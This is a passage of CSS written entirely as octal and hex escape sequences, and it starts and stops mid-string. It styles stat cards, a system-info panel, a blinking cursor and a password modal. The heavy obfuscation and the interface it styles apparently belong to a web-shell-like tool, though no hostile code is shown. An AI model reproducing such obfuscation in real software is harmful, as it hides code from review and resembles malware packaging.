31\x30\60\x25\x3b\40\x6d\141\x78\x2d\x77\151\144\x74\x68\x3a\x20\x31\60\60\60\x70\x78\x3b\x20\155\141\162\147\151\x6e\x3a\x20\x30\x20\141\x75\x74\x6f\73\x20\175\12\40\x9\x9\x2e\x73\x74\x61\164\55\143\x61\x72\144\40\x7b\40\142\141\x63\x6b\147\x72\x6f\x75\156\x64\72\40\x76\141\x72\50\55\55\x62\147\55\155\x65\144\x29\x3b\x20\x62\x6f\162\144\145\162\72\x20\61\160\x78\40\163\157\154\x69\144\40\x76\x61\162\50\x2d\x2d\142\157\x72\144\x65\x72\55\143\x6f\154\157\x72\51\73\40\142\x6f\x72\144\145\162\x2d\x72\141\x64\151\165\x73\72\40\70\160\x78\73\x20\x70\x61\x64\x64\151\156\x67\72\x20\61\x72\145\x6d\73\x20\x64\151\163\160\x6c\141\171\72\40\146\x6c\145\170\73\x20\x66\x6c\145\x78\x2d\x64\x69\x72\x65\143\x74\x69\x6f\156\x3a\x20\143\157\154\x75\x6d\x6e\73\40\x67\x61\160\72\40\60\x2e\70\162\145\155\73\x20\175\12\x20\11\x9\x2e\163\164\141\x74\55\143\x61\x72\x64\55\x68\145\x61\x64\x65\162\x20\173\x20\144\x69\x73\160\x6c\x61\171\72\x20\146\154\145\x78\x3b\40\x6a\165\163\x74\151\146\171\x2d\x63\x6f\156\164\145\x6e\x74\72\x20\x73\160\x61\x63\x65\x2d\x62\x65\164\167\x65\x65\156\x3b\x20\146\x6f\x6e\x74\55\x77\145\151\x67\150\164\72\40\65\x30\60\73\x20\175\xa\x20\x9\11\x2e\163\x74\141\x74\x2d\x63\x61\x72\144\x2d\x6c\141\142\145\x6c\x20\173\x20\x63\157\x6c\157\x72\72\40\166\x61\162\50\55\55\141\143\x63\x65\156\164\55\142\x6c\165\145\51\73\x20\175\12\40\11\x9\56\163\164\x61\164\x2d\143\x61\x72\144\55\160\145\x72\x63\145\156\x74\40\173\x20\x63\157\154\157\162\72\40\166\x61\162\x28\55\x2d\164\145\170\x74\55\154\x69\x67\x68\x74\51\x3b\x20\175\12\x20\11\x9\56\x70\162\157\x67\x72\x65\163\x73\55\x62\141\x72\x2d\x62\x67\x20\173\x20\x62\141\143\153\147\162\x6f\x75\x6e\x64\72\x20\166\141\162\50\55\x2d\x62\147\x2d\x64\141\162\x6b\51\x3b\x20\142\157\x72\144\145\x72\x2d\x72\141\144\151\x75\x73\72\x20\x35\x70\x78\73\x20\x68\x65\151\147\150\164\72\40\x31\x30\x70\170\73\x20\x77\x69\x64\x74\x68\x3a\x20\61\60\x30\45\x3b\x20\x6f\166\145\162\x66\154\x6f\167\72\x20\150\151\144\x64\x65\x6e\x3b\x20\x7d\12\x20\x9\11\x2e\160\162\x6f\147\162\x65\x73\163\x2d\x62\x61\x72\x2d\146\147\40\173\x20\x62\x61\x63\153\x67\x72\157\165\156\x64\72\x20\166\141\x72\50\x2d\55\141\143\x63\x65\x6e\x74\x2d\142\x6c\x75\145\x29\x3b\40\x68\145\x69\147\x68\164\x3a\40\61\60\60\x25\x3b\40\167\x69\x64\164\x68\72\x20\x30\x25\x3b\x20\142\x6f\162\x64\145\x72\55\x72\141\x64\151\165\163\x3a\x20\x35\x70\170\x3b\x20\164\162\x61\156\163\x69\164\x69\x6f\156\x3a\x20\167\151\x64\x74\150\x20\x30\56\x35\x73\40\145\141\x73\x65\x2d\157\x75\x74\x3b\175\xa\x20\11\11\56\x73\x74\141\x74\55\143\x61\x72\x64\x2d\x64\x65\x74\x61\151\x6c\x73\40\173\40\146\157\x6e\x74\55\x73\x69\x7a\145\72\40\x30\56\x38\x72\x65\155\73\x20\143\157\x6c\157\162\x3a\x20\166\141\x72\50\55\x2d\x74\x65\170\x74\x2d\155\145\x64\x29\73\40\x74\x65\x78\164\x2d\x61\x6c\x69\x67\x6e\72\40\x72\x69\x67\x68\164\73\x20\175\12\40\x9\x9\x2e\163\171\163\x2d\151\x6e\146\x6f\55\160\141\156\145\x6c\40\173\x20\167\151\x64\x74\150\x3a\x20\61\60\60\45\x3b\x20\x6d\141\x78\x2d\x77\x69\144\164\x68\x3a\x20\61\60\60\x30\x70\170\x3b\40\155\141\162\147\x69\x6e\x3a\x20\60\x20\141\x75\x74\x6f\x3b\40\x62\157\x72\x64\145\162\x3a\40\x31\160\x78\40\163\x6f\x6c\151\144\40\166\x61\x72\50\x2d\x2d\x62\157\162\x64\145\162\x2d\143\x6f\x6c\157\162\51\x3b\40\142\157\x72\144\x65\x72\x2d\162\x61\x64\151\x75\x73\x3a\x20\70\x70\170\73\x20\x62\x61\x63\x6b\x67\x72\x6f\165\x6e\144\72\x20\x76\x61\162\x28\55\55\x62\147\x2d\x6d\x65\144\51\73\x20\x7d\12\40\11\x9\56\163\171\163\x2d\151\x6e\146\x6f\55\160\x61\156\145\x6c\x2d\150\145\x61\x64\145\x72\40\173\x20\160\141\144\x64\151\156\x67\72\40\x31\x32\160\170\40\61\70\160\x78\x3b\x20\x62\x6f\162\144\145\x72\x2d\142\x6f\x74\164\x6f\155\72\40\x31\x70\x78\x20\163\x6f\x6c\x69\x64\40\x76\141\x72\x28\x2d\55\x62\x6f\162\x64\145\162\55\143\x6f\154\157\x72\x29\73\40\146\x6f\x6e\164\x2d\x77\145\151\147\x68\x74\72\40\x35\x30\x30\73\x20\x63\x6f\x6c\x6f\x72\72\40\166\x61\x72\50\x2d\55\141\143\143\145\x6e\164\55\147\x72\x65\x65\156\x29\73\x20\175\12\x20\x9\x9\56\x62\x6c\x69\x6e\x6b\x69\x6e\147\55\x63\165\162\163\157\x72\40\x7b\40\x61\x6e\x69\x6d\x61\164\151\x6f\x6e\x3a\40\x62\x6c\x69\156\153\40\x31\x73\40\163\x74\x65\x70\x2d\x65\156\x64\40\x69\156\146\x69\x6e\x69\164\x65\73\40\143\157\154\x6f\162\72\x20\166\x61\x72\50\55\55\141\143\x63\145\156\164\x2d\x67\162\145\145\156\x29\73\40\175\xa\40\x9\x9\x40\153\145\x79\x66\x72\x61\155\145\x73\40\x62\x6c\151\156\x6b\40\173\40\146\x72\157\x6d\54\x20\164\157\x20\173\40\x6f\160\141\x63\151\x74\x79\x3a\40\61\x20\175\40\x35\60\x25\40\x7b\x20\157\x70\141\x63\151\164\171\72\x20\60\x20\175\40\175\12\x20\x9\11\x2e\163\x79\x73\55\151\156\146\157\x2d\160\x61\156\x65\154\55\x62\157\x64\171\x20\173\40\160\x61\x64\x64\151\156\147\x3a\x20\x31\x38\x70\x78\x3b\40\x7d\12\40\11\x9\56\163\171\163\x2d\151\156\x66\x6f\x2d\147\x72\151\144\x20\173\x20\x64\x69\163\x70\x6c\141\x79\72\40\x67\162\x69\144\73\x20\x67\162\x69\x64\55\x74\x65\155\x70\154\x61\x74\x65\x2d\x63\x6f\154\x75\x6d\156\163\72\40\x32\x30\60\x70\x78\40\x31\x66\x72\x3b\x20\x67\141\160\72\x20\61\x30\160\170\40\x32\x30\x70\x78\73\x20\146\x6f\156\x74\55\x73\151\x7a\x65\72\x20\61\63\160\170\73\x20\154\151\x6e\x65\55\x68\x65\x69\147\x68\x74\x3a\x20\x31\x2e\x36\73\x20\175\xa\40\x9\11\x2e\163\x79\163\55\151\x6e\146\x6f\x2d\147\162\151\144\x20\163\160\x61\156\x3a\156\x74\x68\55\143\x68\151\x6c\144\x28\157\144\x64\51\40\x7b\40\x66\x6f\x6e\x74\x2d\x77\x65\151\147\x68\x74\72\x20\x35\x30\60\x3b\40\x63\x6f\x6c\157\x72\72\40\166\141\x72\x28\55\55\141\x63\143\x65\156\164\x2d\142\154\165\x65\x29\x3b\40\x74\x65\170\164\55\x61\154\151\147\x6e\x3a\40\162\x69\x67\150\164\73\40\x7d\12\40\11\11\56\163\171\x73\x2d\151\156\146\157\55\x67\x72\x69\x64\40\x73\x70\x61\156\x3a\156\164\x68\x2d\143\150\x69\154\x64\50\x65\166\145\x6e\51\x20\x7b\40\x77\150\151\x74\145\x2d\x73\160\x61\x63\x65\x3a\40\160\x72\x65\x2d\x77\x72\x61\160\x3b\x20\167\157\x72\144\55\142\x72\145\x61\153\x3a\x20\142\x72\145\x61\153\55\141\154\154\73\40\143\x6f\154\157\x72\x3a\40\x76\141\x72\50\55\x2d\x74\145\170\x74\55\x6c\151\147\150\x74\x29\73\x20\x7d\12\x9\x9\56\155\x6f\x64\x61\x6c\40\x7b\x20\xa\x9\11\11\144\x69\x73\160\x6c\141\171\x3a\40\x6e\x6f\x6e\x65\73\40\xa\x9\x9\11\x70\157\x73\x69\x74\x69\157\156\72\x20\146\151\170\145\x64\x3b\40\xa\11\x9\11\x7a\55\151\x6e\144\x65\x78\72\x20\61\x30\x30\60\73\40\xa\x9\x9\11\x6c\x65\146\x74\72\x20\x30\x3b\x20\xa\11\x9\11\x74\157\x70\72\40\60\73\x20\12\x9\x9\x9\167\x69\144\x74\x68\72\40\61\x30\60\x25\x3b\x20\xa\x9\x9\11\150\145\151\147\x68\x74\72\40\x31\60\60\45\x3b\x20\12\x9\11\11\x62\141\143\153\x67\162\157\165\x6e\x64\x3a\x20\162\x67\142\141\x28\x32\x36\x2c\x20\62\71\54\40\63\66\54\40\x30\x2e\70\65\x29\x3b\40\12\x9\11\x9\x62\141\143\153\144\x72\x6f\x70\55\x66\151\x6c\164\145\x72\72\x20\142\x6c\165\x72\x28\70\x70\x78\x29\40\x73\x61\164\165\162\x61\x74\145\50\x31\70\60\x25\x29\x3b\x20\xa\11\11\11\55\x77\x65\142\153\151\x74\x2d\x62\141\x63\153\144\x72\157\x70\x2d\146\151\x6c\x74\x65\162\x3a\40\x62\154\165\x72\x28\x38\x70\x78\x29\40\163\x61\164\x75\162\x61\x74\x65\x28\x31\70\60\45\51\x3b\12\x9\11\11\152\x75\163\164\x69\x66\x79\x2d\x63\x6f\x6e\x74\145\156\x74\x3a\x20\x63\145\156\x74\x65\162\x3b\x20\xa\x9\11\x9\x61\x6c\x69\147\156\x2d\x69\x74\x65\x6d\163\72\40\x63\145\x6e\164\145\162\x3b\40\12\11\11\x9\141\156\x69\155\141\x74\x69\x6f\x6e\72\40\146\141\144\145\111\156\x20\x30\56\63\x73\x20\x63\165\x62\x69\143\x2d\x62\145\x7a\151\145\162\x28\60\56\64\54\40\x30\54\40\60\x2e\x32\54\40\x31\51\x3b\x20\12\11\11\x7d\xa\11\x9\x2e\155\157\144\141\154\56\x73\x68\x6f\x77\40\x7b\40\144\151\x73\x70\154\141\x79\72\40\x66\x6c\145\x78\73\x20\175\12\x9\11\100\x6b\x65\171\x66\x72\x61\x6d\x65\163\x20\x66\141\x64\145\111\x6e\x20\x7b\x20\12\x9\x9\x9\x66\162\157\x6d\x20\173\40\xa\11\x9\x9\11\157\x70\x61\143\x69\164\x79\x3a\x20\x30\x3b\x20\xa\11\11\11\11\142\x61\143\153\144\162\157\160\55\x66\x69\154\164\145\x72\72\40\142\x6c\x75\x72\50\60\160\x78\x29\x3b\xa\11\11\x9\175\40\12\x9\x9\x9\164\x6f\40\173\40\12\11\11\x9\x9\x6f\x70\141\143\151\164\171\72\x20\61\x3b\x20\xa\11\x9\x9\11\x62\x61\x63\x6b\x64\162\157\x70\x2d\x66\151\154\164\x65\162\72\x20\142\154\165\x72\x28\70\x70\170\51\x3b\xa\x9\11\x9\175\40\xa\x9\x9\175\xa\11\11\x2e\x6d\157\x64\141\x6c\x2d\143\157\156\x74\x65\x6e\164\40\173\40\xa\x9\11\x9\x62\x61\x63\x6b\147\x72\157\x75\x6e\144\72\x20\x6c\x69\x6e\145\141\162\55\147\162\141\144\151\145\156\164\x28\61\63\65\144\145\x67\x2c\40\x76\141\x72\x28\x2d\55\142\x67\x2d\155\145\x64\x29\x20\x30\x25\x2c\40\x76\x61\162\x28\55\x2d\x62\x67\55\x6c\x69\x67\150\164\51\x20\x31\x30\x30\x25\51\x3b\x20\xa\x9\11\11\x70\x61\144\144\x69\x6e\x67\72\x20\x30\73\x20\12\11\11\x9\142\x6f\162\x64\145\162\x2d\162\x61\x64\151\165\x73\x3a\x20\61\62\x70\x78\x3b\x20\12\x9\x9\11\x77\x69\144\x74\150\72\x20\70\60\x25\x3b\x20\12\11\11\x9\x62\157\162\x64\x65\162\x3a\x20\x32\x70\170\40\x73\x6f\154\151\x64\x20\166\x61\162\50\x2d\55\142\x6f\x72\144\145\x72\55\x63\x6f\x6c\157\x72\x29\x3b\x20\xa\11\11\x9\x64\x69\163\160\x6c\x61\171\72\40\x66\154\x65\170\73\40\12\11\x9\11\x66\x6c\x65\170\55\144\x69\x72\145\x63\x74\151\157\x6e\72\40\143\x6f\154\165\155\156\x3b\x20\xa\x9\x9\x9\x6d\141\170\x2d\x68\145\x69\x67\x68\x74\72\x20\70\x35\x76\150\x3b\x20\xa\11\11\11\142\157\170\55\163\x68\x61\144\x6f\x77\72\x20\x30\40\x32\x30\x70\170\40\66\60\x70\170\x20\162\147\142\x61\x28\60\x2c\x30\54\60\54\60\56\65\51\x2c\40\xa\x9\x9\11\x9\x9\x9\60\x20\60\40\x30\x20\x31\160\x78\40\162\147\142\x61\50\x32\65\65\54\62\x35\65\54\x32\65\65\x2c\60\56\60\x35\51\40\151\x6e\x73\x65\164\x3b\x20\12\x9\11\x9\141\x6e\151\155\141\x74\x69\157\156\x3a\x20\163\x6c\x69\144\145\x55\160\40\60\56\x33\x73\40\x63\165\142\151\x63\x2d\x62\x65\172\x69\145\162\50\x30\56\64\x2c\40\60\x2c\x20\60\56\62\54\x20\61\51\x3b\x20\xa\x9\11\11\157\x76\x65\x72\x66\x6c\157\167\72\40\x68\x69\144\144\145\156\73\xa\11\x9\11\x70\157\x73\151\164\x69\157\156\72\x20\x72\x65\x6c\x61\164\151\x76\145\x3b\xa\11\x9\x7d\xa\x9\11\x2e\x6d\157\144\x61\154\x2d\143\x6f\x6e\x74\x65\x6e\x74\72\x3a\x62\145\x66\157\x72\145\x20\173\12\11\x9\x9\143\x6f\x6e\x74\x65\x6e\x74\72\40\x27\47\x3b\12\x9\11\11\160\x6f\x73\151\x74\x69\x6f\x6e\72\40\x61\142\163\157\154\165\164\x65\73\xa\11\x9\x9\x74\157\160\x3a\x20\60\73\12\x9\x9\x9\154\145\x66\x74\x3a\x20\x30\x3b\12\x9\11\11\x72\151\x67\150\164\x3a\x20\60\x3b\xa\11\11\11\150\145\x69\147\150\x74\x3a\40\63\160\x78\73\12\11\x9\11\142\x61\x63\153\x67\x72\157\165\156\x64\72\x20\154\151\156\x65\x61\x72\x2d\147\x72\141\x64\x69\x65\156\x74\x28\x39\60\x64\x65\147\54\40\166\x61\162\x28\x2d\x2d\141\x63\x63\x65\x6e\x74\x2d\x62\154\x75\145\51\x2c\x20\166\x61\x72\50\55\55\141\x63\x63\145\x6e\x74\x2d\147\157\154\144\51\x2c\40\166\141\x72\50\55\55\141\x63\x63\145\x6e\164\55\142\154\x75\x65\51\51\73\12\x9\11\x9\x62\x61\x63\153\x67\x72\x6f\x75\156\x64\55\163\x69\172\145\x3a\40\x32\60\60\45\40\61\60\60\45\x3b\xa\11\x9\11\x61\156\151\155\141\164\x69\x6f\156\x3a\40\x73\x68\151\155\x6d\145\162\40\63\x73\40\154\x69\x6e\x65\141\x72\40\151\156\x66\151\156\151\x74\145\73\xa\11\x9\x7d\12\11\11\x40\x6b\x65\x79\x66\x72\x61\x6d\145\x73\40\163\150\x69\x6d\155\145\x72\40\x7b\12\11\11\x9\60\x25\x20\x7b\40\x62\141\x63\153\x67\x72\x6f\x75\156\x64\x2d\160\x6f\163\151\x74\x69\157\x6e\x3a\x20\x2d\62\x30\x30\x25\x20\x30\x3b\x20\x7d\xa\11\x9\11\x31\x30\x30\x25\40\173\x20\x62\x61\143\x6b\147\x72\x6f\165\156\144\55\160\157\163\151\164\151\x6f\156\x3a\x20\62\x30\60\45\40\x30\x3b\x20\x7d\12\11\11\175\12\x9\x9\100\x6b\x65\x79\x66\x72\x61\x6d\x65\163\x20\163\x6c\151\144\x65\x55\160\40\173\x20\xa\11\x9\x9\x66\x72\x6f\155\40\173\40\12\x9\11\11\x9\164\162\141\x6e\163\146\x6f\x72\x6d\72\x20\164\162\141\x6e\x73\x6c\x61\164\145\131\50\x33\60\x70\170\51\x20\x73\143\x61\154\145\50\x30\56\x39\x35\x29\73\40\xa\x9\x9\11\x9\x6f\160\141\143\x69\x74\x79\72\40\x30\x3b\40\xa\11\x9\x9\175\x20\12\x9\x9\11\x74\x6f\x20\173\40\xa\x9\x9\11\x9\164\x72\141\x6e\163\x66\x6f\162\x6d\x3a\40\164\x72\x61\156\x73\x6c\141\164\145\x59\x28\60\x29\40\x73\143\x61\x6c\145\x28\61\x29\73\x20\xa\11\x9\11\x9\157\x70\141\x63\151\x74\x79\72\40\x31\73\x20\xa\11\11\11\x7d\40\xa\11\x9\x7d\12\11\11\56\155\x6f\144\x61\154\55\x68\145\x61\144\145\162\x20\x7b\40\xa\11\11\11\x64\x69\x73\x70\154\141\171\72\x20\x66\x6c\x65\x78\x3b\x20\12\x9\x9\11\152\x75\x73\x74\151\x66\171\x2d\143\x6f\156\164\x65\x6e\x74\72\x20\x73\x70\x61\143\145\55\142\145\164\167\145\145\156\x3b\x20\xa\x9\11\x9\x61\x6c\151\147\x6e\55\151\164\145\x6d\x73\72\x20\x63\145\x6e\164\145\162\73\x20\12\x9\x9\x9\155\141\162\147\151\156\55\142\x6f\x74\164\x6f\x6d\72\x20\60\73\40\12\x9\x9\x9\160\141\144\x64\151\156\x67\x3a\40\61\56\x35\x72\x65\155\x3b\12\x9\11\x9\x62\x61\143\153\x67\162\157\x75\x6e\144\x3a\x20\x6c\151\x6e\x65\x61\x72\x2d\147\x72\x61\x64\151\145\156\x74\50\x31\63\65\144\x65\147\54\x20\x76\141\x72\50\55\55\142\147\55\x6c\x69\x67\x68\x74\51\x20\60\45\x2c\40\x76\141\x72\50\x2d\55\142\x67\55\155\x65\144\x29\40\61\x30\x30\45\x29\x3b\12\x9\x9\11\142\157\x72\144\145\162\x2d\x62\x6f\164\164\157\155\x3a\x20\62\x70\170\40\x73\157\x6c\151\x64\40\x76\141\x72\50\x2d\x2d\142\157\162\144\x65\162\55\x63\x6f\154\157\162\x29\x3b\xa\11\x9\x7d\12\11\11\56\x6d\x6f\x64\141\x6c\55\x68\x65\141\144\x65\162\40\x68\x33\40\173\x20\12\11\x9\11\155\141\x72\147\151\x6e\x3a\40\60\x3b\40\12\11\11\11\x66\157\x6e\x74\55\x77\x65\x69\x67\x68\164\72\x20\66\60\60\x3b\x20\xa\11\x9\x9\143\157\x6c\157\162\72\40\166\x61\162\50\x2d\55\x61\x63\x63\145\x6e\164\x2d\x67\157\x6c\144\x29\x3b\x20\xa\x9\11\11\x66\x6f\156\164\55\x73\x69\172\145\x3a\40\x31\x2e\x33\x72\145\x6d\73\xa\11\x9\x9\x64\151\163\160\154\141\171\x3a\40\x66\154\x65\x78\73\xa\x9\11\x9\141\x6c\x69\x67\156\x2d\x69\164\x65\x6d\163\72\x20\x63\x65\156\x74\x65\162\73\12\x9\x9\x9\147\141\160\x3a\40\x30\56\65\162\145\x6d\73\xa\11\11\175\xa\x9\x9\56\x6d\157\144\x61\154\55\x62\x6f\144\171\40\173\40\12\x9\x9\11\157\x76\145\162\x66\x6c\x6f\x77\x2d\171\72\40\x61\165\164\x6f\73\x20\xa\x9\x9\11\x66\154\145\170\72\x20\61\73\x20\xa\x9\x9\x9\160\x61\x64\x64\151\156\147\x3a\40\x31\56\65\162\x65\155\73\xa\x9\11\x7d\12\x9\11\x2e\143\x6c\x6f\x73\x65\40\x7b\x20\xa\x9\11\x9\x66\x6f\156\164\x2d\x73\151\x7a\145\x3a\x20\x32\x72\145\x6d\x3b\x20\12\x9\x9\x9\143\165\x72\163\x6f\x72\x3a\x20\160\157\x69\156\164\145\162\x3b\40\12\x9\11\x9\143\157\154\157\x72\x3a\40\x76\141\162\x28\55\x2d\x74\x65\x78\x74\x2d\x6d\145\144\x29\x3b\x20\12\x9\x9\x9\x74\162\x61\156\163\x69\164\x69\x6f\156\x3a\40\141\x6c\154\40\x30\56\63\x73\40\x63\x75\x62\x69\x63\55\x62\145\172\151\145\162\50\60\x2e\64\x2c\40\60\54\x20\x30\x2e\x32\54\x20\x31\51\73\x20\12\x9\x9\x9\154\151\x6e\145\55\x68\145\x69\147\x68\x74\72\40\61\x3b\x20\12\x9\x9\11\x77\x69\x64\x74\150\x3a\x20\63\62\160\170\73\12\11\11\11\150\145\x69\x67\x68\x74\72\40\x33\62\x70\170\73\12\x9\11\x9\144\151\163\x70\x6c\141\x79\72\x20\146\154\145\x78\73\12\11\11\11\x61\x6c\151\x67\156\55\x69\x74\145\155\163\72\x20\x63\x65\x6e\164\145\162\x3b\12\x9\x9\11\x6a\165\163\x74\x69\146\x79\x2d\x63\157\x6e\x74\145\x6e\164\72\x20\143\145\156\x74\145\162\73\xa\x9\x9\x9\142\157\162\x64\x65\162\55\162\141\144\x69\x75\163\72\40\65\60\45\73\12\11\11\x9\x62\141\143\153\147\x72\157\165\156\144\72\x20\x74\x72\141\x6e\163\x70\141\x72\x65\156\x74\x3b\xa\x9\11\x7d\xa\x9\x9\x2e\x63\154\x6f\x73\145\72\x68\x6f\166\x65\x72\x20\x7b\40\12\11\11\x9\x63\157\154\x6f\162\x3a\x20\x76\x61\x72\x28\55\x2d\141\x63\x63\145\x6e\164\x2d\x72\x65\144\51\73\x20\12\x9\x9\11\142\141\143\153\x67\x72\x6f\165\156\x64\72\x20\x72\x67\x62\x61\x28\x32\x35\x35\54\40\67\67\x2c\40\67\x37\x2c\x20\x30\56\x31\x29\73\xa\x9\11\x9\164\162\141\156\x73\x66\x6f\x72\x6d\72\x20\162\x6f\164\141\x74\x65\50\x39\60\144\145\x67\x29\x20\163\x63\141\154\x65\x28\x31\x2e\61\x29\73\12\11\11\175\xa\x9\x9\x2e\x63\154\x6f\163\145\x3a\x61\143\x74\x69\166\145\40\x7b\xa\11\x9\x9\x74\x72\141\x6e\x73\146\157\x72\x6d\72\x20\162\x6f\164\x61\164\x65\x28\71\x30\x64\145\147\x29\40\163\143\x61\154\x65\x28\60\x2e\x39\65\x29\73\12\x9\x9\175\xa\x9\11\12\x9\11\57\52\40\120\x61\163\x73\167\x6f\162\144\x20\115\x6f\x64\141\x6c\40\x53\164\x79\154\151\156\147\x20\x2a\57\12\11\x9\x2e\x70\141\x73\163\167\x6f\x72\144\x2d\x6d\x6f\x64\141\x6c\x2d\x63\x6f\156\164\145\156\164\40\x7b\x20\167\x69\x64\x74\x68\72\x20\71\x30\x25\73\40\155\x61\x78\55\167\x69\x64\x74\150\x3a\40\65\x30\x30\x70\170\x3b\40\160\141\x64\x64\151\x6e\147\x3a\x20\62\x72\145\x6d\x3b\40\175\xa\11\x9\x2e\x70\x61\163\163\x77\x6f\162\x64\55\x6d\x6f\144\x61\x6c\55\150\x65\141\x64\145\x72\40\x7b\40\x62\x6f\x72\144\x65\162\55\142\x6f\164\164\x6f\x6d\x3a\40\62\x70\170\x20\x73\157\x6c\151\x64\40\x76\x61\x72\50\x2d\55\x62\157\162\144\x65\x72\55\143\157\x6c\x6f\162\x29\73\40\x70\x61\x64\x64\151\156\147\x2d\142\157\164\164\x6f\x6d\x3a\40\x31\x72\145\x6d\x3b\40\155\x61\x72\147\151\x6e\x2d\x62\157\164\164\x6f\x6d\72\x20\61\x2e\65\x72\145\155\73\x20\x7d\xa\11\11\x2e\160\141\x73\x73\167\157\162\144\55\x6d\x6f\x64\141\154\x2d\x68\x65\x61\144\x65\162\x20\x68\x33\x20\173\40\146\x6f\x6e\x74\x2d\163\x69\x7a\x65\72\x20\61\56\x35\162\145\x6d\73\x20\143\157\x6c\x6f\162\x3a\x20\x76\141\x72\50\x2d\55\141\x63\143\x65\x6e\x74\x2d\142\154\x75\x65\51\x3b\x20\x64\x69\163\x70\x6c\141\171\x3a\40\x66\x6c\x65\x78\x3b\40\x61\154\151\147\156\x2d\151\164\x65\x6d\x73\x3a\x20\x63\x65\156\164\145\162\x3b\40\147\x61\x70\x3a\40\60\56\65\x72\x65\155\x3b\x20\x7d\12\x9\11\56\x70\141\163\163\167\x6f\162\x64\x2d\155\x6f\144\141\154\55\142\157\x64\x79\40\x7b\x20\144\151\x73\x70\154\141\x79\x3a\x20\146\x6c\145\x78\x3b\x20\146\x6c\x65\x78\x2d\144\x69\x72\x65\143\x74\151\x6f\156\72\40\143\157\x6c\165\155\x6e\x3b\40\147\141\x70\72\x20\61\x2e\x35\x72\145\155\x3b\x20\x7d\xa\11\x9\x2e\160\141\x73\163\x77\157\162\x64\55\151\156\x66\157\55\142\157\170\40\173\40\142\x61\143\x6b\147\162\157\x75\x6e\x64\x3a\40\154\151\x6e\x65\x61\x72\55\x67\162\141\144\x69\x65\156\x74\x28\x31\63\65\x64\x65\x67\x2c\x20\x76\141\162\50\55\x2d\x62\x67\55\x6c\x69\x67\150\x74\x29\40\x30\x25\x2c\x20\166\141\x72\x28\55\x2d\142\147\55\x6d\x65\144\x29\x20\61\x30\60\45\51\73\x20\x62\157\x72\144\x65\x72\72\40\62\160\x78\40\163\x6f\154\x69\x64\x20\166\x61\x72\50\55\55\x61\x63\143\145\156\x74\55\142\x6c\x75\x65\x29\x3b\40\142\x6f\162\x64\145\x72\55\162\141\x64\151\x75\x73\72\40\x31\62\x70\x78\73\x20\160\x61\144\144\x69\156\147\x3a\x20\x31\56\x35\162\145\x6d\x3b\x20\x74\x65\x78\x74\55\141\154\x69\x67\x6e\x3a\40\x63\x65\x6e\164\x65\x72\x3b\40\160\157\x73\x69\164\151\x6f\x6e\72\40\162\145\154\141\x74\151\166\x65\x3b\x20\x6f\x76\145\x72\146\x6c\157\167\72\40\x68\151\144\x64\145\x6e\x3b\x20\x7d\xa\11\11\x2e\x70\x61\163\x73\x77\157\x72\144\55\x69\156\x66\157\55\142\x6f\170\x3a\72\142\x65\146\157\x72\145\x20\173\x20\x63\x6f\x6e\x74\x65\x6e\164\x3a\x20\x27\x27\x3b\40\160\x6f\x73\151\x74\x69\157\156\72\40\x61\142\x73\157\154\165\164\x65\73\x20\164\x6f\x70\72\40\55\x35\x30\x25\73\x20\x6c\145\146\164\x3a\x20\55\x35\60\45\x3b\40\x77\x69\144\x74\x68\x3a\x20\62\60\x30\x25\x3b\40\x68\145\x69\147\150\x74\x3a\40\x32\x30\60\x25\x3b\40\x62\x61\143\x6b\x67\x72\x6f\x75\156\x64\x3a\40\x72\x61\x64\x69\x61\x6c\55\147\162\x61\x64\151\145\x6e\x74\x28\x63\151\x72\143\154\145\x2c\x20\x72\x67\x62\x61\x28\x31\63\60\54\40\61\x37\x30\54\40\62\x35\x35\x2c\40\x30\x2e\x31\x29\40\60\45\x2c\40\164\x72\141\156\x73\x70\x61\162\x65\x6e\x74\x20\67\x30\45\x29\73\x20\x61\x6e\x69\155\x61\x74\151\x6f\156\72\40\162\157\164\x61\x74\x65\40\x32\60\x73\x20\154\x69\x6e\x65\141\x72\40\x69\x6e\x66\x69\156\x69\x74\145\73\x20\x7d\xa\x9\11\x40\x6b\145\x79\x66\x72\141\x6d\x65\x73\x20\x72\157\164\x61\164\x65\x20\173\40\x66\162\x6f\155\x20\x7b\40\x74\x72\x61\156\163\x66\x6f\162\155\x3a\40\162\157\x74\x61\x74\x65\50\60\144\x65\147\x29\73\40\x7d\x20\164\157\x20\x7b\x20\164\162\x61\x6e\163\x66\157\x72\155\72\40\x72\157\164\141\164\x65\x28\63\66\x30\x64\x65\147\51\73\x20\x7d\x20\x7d\12\x9\x9\x2e\160\141\x73\163\167\x6f\x72\x64\55\151\143\x6f\x6e\x20\173\40\x66\157\x6e\164\55\x73\151\172\145\x3a\x20\x33\x72\x65\155\x3b\x20\x6d\x61\x72\147\x69\156\55\x62\157\164\x74\x6f\x6d\72\40\61\x72\145\x6d\x3b\40\x61\x6e\151\x6d\x61\164\x69\157\156\x3a\x20\x62\x6f\165\x6e\143\145\x20\x32\163\40\x65\141\x73\x65\55\151\156\55\x6f\165\x74\x20\151\156\x66\151\x6e\151\164\145\x3b\x20\x70\157\x73\x69\x74\151\157\x6e\72\x20\x72\145\x6c\141\164\x69\166\x65\x3b\x20\172\55\151\156\x64\145\170\x3a\x20\61\73\x20\175\xa\x9\x9\100\x6b\145\x79\x66\162\141\x6d\x65\x73\x20\142\x6f\x75\x6e\x63\145\40\173\x20\x30\45\54\x20\x31\60\60\45\40\173\40\x74\x72\x61\x6e\163\x66\157\x72\155\72\x20\164\162\x61\156\163\154\x61\x74\145\131\50\x30\x29\x3b\40\175\40\65\x30\x25\40\173\x20\164\162\x61\x6e\x73\x66\x6f\162\x6d\72\x20\164\162\141\x6e\x73\x6c\x61\164\x65\131\50\x2d\x31\x30\160\170\x29\x3b\x20\x7d\x20\175\12\11\11\56\160\x61\x73\163\167\x6f\162\144\55\150\x69\x6e\164\x20\173\x20\143\157\154\x6f\x72\x3a\x20\166\x61\x72\x28\55\55\164\145\x78\x74\55\x6c\x69\147\150\164\x29\73\x20\146\x6f\x6e\x74\x2d\x73\151\x7a\145\72\x20\61\162\x65\x6d\73\x20\x6d\141\162\147\x69\156\72\40\60\x20\x30\40\61\x72\x65\x6d\x20\60\73\x20\160\x6f\x73\x69\164\x69\157\x6e\x3a\40\162\x65\154\141\x74\x69\x76\x65\73\x20\172\x2d\151\156\x64\145\x78\72\x20\x31\73\40\x7d\xa\x9\x9\56\160\x61\x73\163\x77\x6f\x72\x64\55\144\151\163\x70\154\x61\171\x20\x7b\x20\144\x69\163\160\154\141\x79\72\x20\x66\154\145\x78\x3b\40\141\154\151\147\x6e\x2d\151\x74\145\155\x73\72\40\143\145\156\x74\x65\x72\73\40\152\165\x73\164\151\x66\x79\x2d\x63\157\156\164\145\x6e\x